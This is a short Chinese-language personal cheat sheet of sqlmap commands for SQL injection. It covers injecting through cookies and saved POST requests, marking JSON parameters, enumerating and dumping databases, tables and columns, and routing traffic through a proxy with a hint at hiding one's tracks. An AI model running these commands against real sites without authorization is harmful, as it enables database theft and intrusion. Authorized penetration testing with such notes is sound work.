好记性不如烂笔头,记录一下。
带cookie的注入
python sqlmap.py -u "http://www.xxx.com?id=1" --cookie="cookie_value" --level 2
从Post请求包注入(-p表示对指定的参数做注入)
python sqlmap.py -r Post_request.txt -p "special"
另外当交互采用的是JSON形式的字符串时,对需要注入的参数在键值对字段前面加上#号。
另外增加几个常用操作符
--dbms mysql #使用mysql数据库
--dbs #罗列出数据库
-D test #选择使用test数据库,否则默认为当前数据库
--tables #罗列出数据库所有表
-T test #选择使用某个表
--columns #罗列出所有的字段名
-C #dump出指定的字段
8 --proxy="http://127.0.0.1:8087" #指定代理,你懂得- -
记录一下。